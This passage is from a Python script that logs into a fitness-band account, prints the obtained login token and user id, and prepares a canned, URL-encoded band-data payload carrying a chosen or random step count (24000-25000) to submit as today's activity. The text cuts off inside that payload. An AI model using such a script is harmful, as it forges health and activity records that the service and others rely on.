}
# Exchange the access code for a login token and user id.
r2 = requests.post(url2, data=data2, headers=headers).json()
login_token = r2["token_info"]["login_token"]
print("login_token获取成功!")
print(login_token)
userid = r2["token_info"]["user_id"]
print("userid获取成功!")
print(userid)
return login_token, userid
# Main routine
def main(user, passwd, step):
# Orchestrates one step upload for a single account: validate input,
# log in, then (below) patch the canned band-data payload with today's
# date and the requested step count and POST it.
user = str(user)
password = str(passwd)
step = str(step)
if user == '' or password == '':
print("User name or password cannot be empty!")
return "用户名或密码不能为空!"
if step == '':
# Empty step field: pick a random plausible daily count.
print("已设置为随机步数(24000-25000)")
step = str(random.randint(24000, 25000))
login_token = 0
login_token, userid = login(user, password)
if login_token == 0:
print("Login failed, account number or password is wrong!")
return "登陆失败,账号或密码错误!(请重新刷新网页)"
t = get_time()
app_token = get_app_token(login_token)
# %F == %Y-%m-%d; used to stamp the payload with today's date.
today = time.strftime("%F")
data_json = '%5B%7B%22data_hr%22%3A%22%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9L%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FVv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0v%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9e%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0n%5C%2Fa%5C%2F%5C%2F%5C%2FS%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0b%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F1FK%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FR%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9PTFFpaf9L%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FR%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0j%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9K%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FOv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fzf%5C%2F%5C%2F%5C%2F86%5C%2Fzr%5C%2FOv88%5C%2Fzf%5C%2FPf%5C%2F%5C%2F%5C%2F0v%5C%2FS%5C%2F8%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FSf%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fz3%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0r%5C%2FOv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FS%5C%2F9L%5C%2Fzb%5C%2FSf9K%5C%2F0v%5C%2FRf9H%5C%2Fzj%5C%2FSf9K%5C%2F0%5C%2F%5C%2FN%5C%2F%5C%2F%5C%2F%5C%2F0D%5C%2FSf83%5C%2Fzr%5C%2FPf9M%5C%2F0v%5C%2FOv9e%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FS%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fzv%5C%2F%5C%2Fz7%5C%2FO%5C%2F83%5C%2Fzv%5C%2FN%5C%2F83%5C%2Fzr%5C%2FN%5C%2F86%5C%2Fz%5C%2F%5C%2FNv83%5C%2Fzn%5C%2FXv84%5C%2Fzr%5C%2FPP84%5C%2Fzj%5C%2FN%5C%2F9e%5C%2Fzr%5C%2FN%5C%2F89%5C%2F03%5C%2FP%5C%2F89%5C%2Fz3%5C%2FQ%5C%2F9N%5C%2F0v%5C%2FTv9C%5C%2F0H%5C%2FOf9D%5C%2Fzz%5C%2FOf88%5C%2Fz%5C%2F%5C%2FPP9A%5C%2Fzr%5C%2FN%5C%2F86%5C%2Fzz%5C%2FNv87%5C%2F0D%5C%2
FOv84%5C%2F0v%5C%2FO%5C%2F84%5C%2Fzf%5C%2FMP83%5C%2FzH%5C%2FNv83%5C%2Fzf%5C%2FN%5C%2F84%5C%2Fzf%5C%2FOf82%5C%2Fzf%5C%2FOP83%5C%2Fzb%5C%2FMv81%5C%2FzX%5C%2FR%5C%2F9L%5C%2F0v%5C%2FO%5C%2F9I%5C%2F0T%5C%2FS%5C%2F9A%5C%2Fzn%5C%2FPf89%5C%2Fzn%5C%2FNf9K%5C%2F07%5C%2FN%5C%2F83%5C%2Fzn%5C%2FNv83%5C%2Fzv%5C%2FO%5C%2F9A%5C%2F0H%5C%2FOf8%5C%2F%5C%2Fzj%5C%2FPP83%5C%2Fzj%5C%2FS%5C%2F87%5C%2Fzj%5C%2FNv84%5C%2Fzf%5C%2FOf83%5C%2Fzf%5C%2FOf83%5C%2Fzb%5C%2FNv9L%5C%2Fzj%5C%2FNv82%5C%2Fzb%5C%2FN%5C%2F85%5C%2Fzf%5C%2FN%5C%2F9J%5C%2Fzf%5C%2FNv83%5C%2Fzj%5C%2FNv84%5C%2F0r%5C%2FSv83%5C%2Fzf%5C%2FMP%5C%2F%5C%2F%5C%2Fzb%5C%2FMv82%5C%2Fzb%5C%2FOf85%5C%2Fz7%5C%2FNv8%5C%2F%5C%2F0r%5C%2FS%5C%2F85%5C%2F0H%5C%2FQP9B%5C%2F0D%5C%2FNf89%5C%2Fzj%5C%2FOv83%5C%2Fzv%5C%2FNv8%5C%2F%5C%2F0f%5C%2FSv9O%5C%2F0ZeXv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F1X%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9B%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FTP%5C%2F%5C%2F%5C%2F1b%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9N%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2F
v7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%
2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%22%2C%22date%22%3A%222021-08-07%22%2C%22data%22%3A%5B%7B%22start%22%3A0%2C%22stop%22%3A1439%2C%22value%22%3A%22UA8AUBQAUAwAUBoAUAEAYCcAUBkAUB4AUBgAUCAAUAEAUBkAUAwAYAsAYB8AYB0AYBgAYCoAYBgAYB4AUCcAUBsAUB8AUBwAUBIAYBkAYB8AUBoAUBMAUCEAUCIAYBYAUBwAUCAAUBgAUCAAUBcAYBsAYCUAATIPYD0KECQAYDMAYB0AYAsAYCAAYDwAYCIAYB0AYBcAYCQAYB0AYBAAYCMAYAoAYCIAYCEAYCYAYBsAYBUAYAYAYCIAYCMAUB0AUCAAUBYAUCoAUBEAUC8AUB0AUBYAUDMAUDoAUBkAUC0AUBQAUBwAUA0AUBsAUAoAUCEAUBYAUAwAUB4AUAwAUCcAUCYAUCwKYDUAAUUlEC8IYEMAYEgAYDoAYBAAUAMAUBkAWgAAWgAAWgAAWgAAWgAAUAgAWgAAUBAAUAQAUA4AUA8AUAkAUAIAUAYAUAcAUAIAWgAAUAQAUAkAUAEAUBkAUCUAWgAAUAYAUBEAWgAAUBYAWgAAUAYAWgAAWgAAWgAAWgAAUBcAUAcAWgAAUBUAUAoAUAIAWgAAUAQAUAYAUCgAWgAAUAgAWgAAWgAAUAwAWwAAXCMAUBQAWwAAUAIAWgAAWgAAWgAAWgAAWgAAWgAAWgAAWgAAWREAWQIAUAMAWSEAUDoAUDIAUB8AUCEAUC4AXB4AUA4AWgAAUBIAUA8AUBAAUCUAUCIAUAMAUAEAUAsAUAMAUCwAUBYAWgAAWgAAWgAAWgAAWgAAWgAAUAYAWgAAWgAAWgAAUAYAWwAAWgAAUAYAXAQAUAMAUBsAUBcAUCAAWwAAWgAAWgAAWgAAWgAAUBgAUB4AWgAAUAcAUAwAWQIAWQkAUAEAUAIAWgAAUAoAWgAAUAYAUB0AWgAAWgAAUAkAWgAAWSwAUBIAWgAAUC4AWSYAWgAAUAYAUAoAUAkAUAIAUAcAWgAAUAEAUBEAUBgAUBcAWRYAUA0AWSgAUB4AUDQAUBoAXA4AUA8AUBwAUA8AUA4AUA4AWgAAUAIAUCMAWgAAUCwAUBgAUAYAUAAAUAAAUAAAUAAAUAAAUAAAUAAAUAAAUAAAWwAAUAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAeSEAeQ8AcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBcAcAAAcAAAcCYOcBUAUAAAUAAAUAAAUAAAUAUAUAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCgAeQAAcAAAcAAAcAAAcAAAcAAAcAYAcAAAcBgAeQAAcAAAcAAAegAAegAAcAAAcAcAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCkAeQAAcAcAcAAAcAAAcAwAcAAAcAAAcAIAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCIAeQAAcAAAcAAAcAAAcAAAcAAAeRwAeQAAWgAAUAAAUAAAUAAAUAAAUAAAcAAAcAAAcBoAeScAeQAAegAAcBkAeQAAUAAAUAAAUAAAUAAAUAAAUAAAcAAAcAAAcAAAcAAAcAAAcAAAegAAegAAcAAAcAAAcBgAeQAAcAAAcAAAcAAAcAAAcAAAcAkAegAAegAAcAcAcAAAcAcAcAAAcAAAcAAAcAAAcA8AeQAAcAAAcAAAeRQAcAwAUAAAUAAAUAAAUAAAUAAAUAAAcAAA
cBEAcA0AcAAAWQsAUAAAUAAAUAAAUAAAUAAAcAAAcAoAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAYAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBYAegAAcAAAcAAAegAAcAcAcAAAcAAAcAAAcAAAcAAAeRkAegAAegAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAEAcAAAcAAAcAAAcAUAcAQAcAAAcBIAeQAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBsAcAAAcAAAcBcAeQAAUAAAUAAAUAAAUAAAUAAAUBQAcBYAUAAAUAAAUAoAWRYAWTQAWQAAUAAAUAAAUAAAcAAAcAAAcAAAcAAAcAAAcAMAcAAAcAQAcAAAcAAAcAAAcDMAeSIAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBQAeQwAcAAAcAAAcAAAcAMAcAAAeSoAcA8AcDMAcAYAeQoAcAwAcFQAcEMAeVIAaTYAbBcNYAsAYBIAYAIAYAIAYBUAYCwAYBMAYDYAYCkAYDcAUCoAUCcAUAUAUBAAWgAAYBoAYBcAYCgAUAMAUAYAUBYAUA4AUBgAUAgAUAgAUAsAUAsAUA4AUAMAUAYAUAQAUBIAASsSUDAAUDAAUBAAYAYAUBAAUAUAUCAAUBoAUCAAUBAAUAoAYAIAUAQAUAgAUCcAUAsAUCIAUCUAUAoAUA4AUB8AUBkAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAA
fgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAA%22%2C%22tz%22%3A32%2C%22did%22%3A%22DA932FFFFE8816E7%22%2C%22src%22%3A24%7D%5D%2C%22sum
mary%22%3A%22%7B%5C%22v%5C%22%3A6%2C%5C%22slp%5C%22%3A%7B%5C%22st%5C%22%3A1628296479%2C%5C%22ed%5C%22%3A1628296479%2C%5C%22dp%5C%22%3A0%2C%5C%22lt%5C%22%3A0%2C%5C%22wk%5C%22%3A0%2C%5C%22usrSt%5C%22%3A-1440%2C%5C%22usrEd%5C%22%3A-1440%2C%5C%22wc%5C%22%3A0%2C%5C%22is%5C%22%3A0%2C%5C%22lb%5C%22%3A0%2C%5C%22to%5C%22%3A0%2C%5C%22dt%5C%22%3A0%2C%5C%22rhr%5C%22%3A0%2C%5C%22ss%5C%22%3A0%7D%2C%5C%22stp%5C%22%3A%7B%5C%22ttl%5C%22%3A18272%2C%5C%22dis%5C%22%3A10627%2C%5C%22cal%5C%22%3A510%2C%5C%22wk%5C%22%3A41%2C%5C%22rn%5C%22%3A50%2C%5C%22runDist%5C%22%3A7654%2C%5C%22runCal%5C%22%3A397%2C%5C%22stage%5C%22%3A%5B%7B%5C%22start%5C%22%3A327%2C%5C%22stop%5C%22%3A341%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A481%2C%5C%22cal%5C%22%3A13%2C%5C%22step%5C%22%3A680%7D%2C%7B%5C%22start%5C%22%3A342%2C%5C%22stop%5C%22%3A367%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A2295%2C%5C%22cal%5C%22%3A95%2C%5C%22step%5C%22%3A2874%7D%2C%7B%5C%22start%5C%22%3A368%2C%5C%22stop%5C%22%3A377%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1592%2C%5C%22cal%5C%22%3A88%2C%5C%22step%5C%22%3A1664%7D%2C%7B%5C%22start%5C%22%3A378%2C%5C%22stop%5C%22%3A386%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1072%2C%5C%22cal%5C%22%3A51%2C%5C%22step%5C%22%3A1245%7D%2C%7B%5C%22start%5C%22%3A387%2C%5C%22stop%5C%22%3A393%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1036%2C%5C%22cal%5C%22%3A57%2C%5C%22step%5C%22%3A1124%7D%2C%7B%5C%22start%5C%22%3A394%2C%5C%22stop%5C%22%3A398%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A488%2C%5C%22cal%5C%22%3A19%2C%5C%22step%5C%22%3A607%7D%2C%7B%5C%22start%5C%22%3A399%2C%5C%22stop%5C%22%3A414%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A2220%2C%5C%22cal%5C%22%3A120%2C%5C%22step%5C%22%3A2371%7D%2C%7B%5C%22start%5C%22%3A415%2C%5C%22stop%5C%22%3A427%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1268%2C%5C%22cal%5C%22%3A59%2C%5C%22step%5C%22%3A1489%7D%2C%7B%5C%22start%5C%22%3A428%2C%5C%22stop%5C%22%3A433%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A152%2C%5C%22cal%5C%22%3A4%2C%5C%22step%5C%22%3A238%7D%2C%7B%5C%22star
t%5C%22%3A434%2C%5C%22stop%5C%22%3A444%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A2295%2C%5C%22cal%5C%22%3A95%2C%5C%22step%5C%22%3A2874%7D%2C%7B%5C%22start%5C%22%3A445%2C%5C%22stop%5C%22%3A455%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1592%2C%5C%22cal%5C%22%3A88%2C%5C%22step%5C%22%3A1664%7D%2C%7B%5C%22start%5C%22%3A456%2C%5C%22stop%5C%22%3A466%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1072%2C%5C%22cal%5C%22%3A51%2C%5C%22step%5C%22%3A1245%7D%2C%7B%5C%22start%5C%22%3A467%2C%5C%22stop%5C%22%3A477%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1036%2C%5C%22cal%5C%22%3A57%2C%5C%22step%5C%22%3A1124%7D%2C%7B%5C%22start%5C%22%3A478%2C%5C%22stop%5C%22%3A488%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A488%2C%5C%22cal%5C%22%3A19%2C%5C%22step%5C%22%3A607%7D%2C%7B%5C%22start%5C%22%3A489%2C%5C%22stop%5C%22%3A499%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A2220%2C%5C%22cal%5C%22%3A120%2C%5C%22step%5C%22%3A2371%7D%2C%7B%5C%22start%5C%22%3A500%2C%5C%22stop%5C%22%3A511%2C%5C%22mode%5C%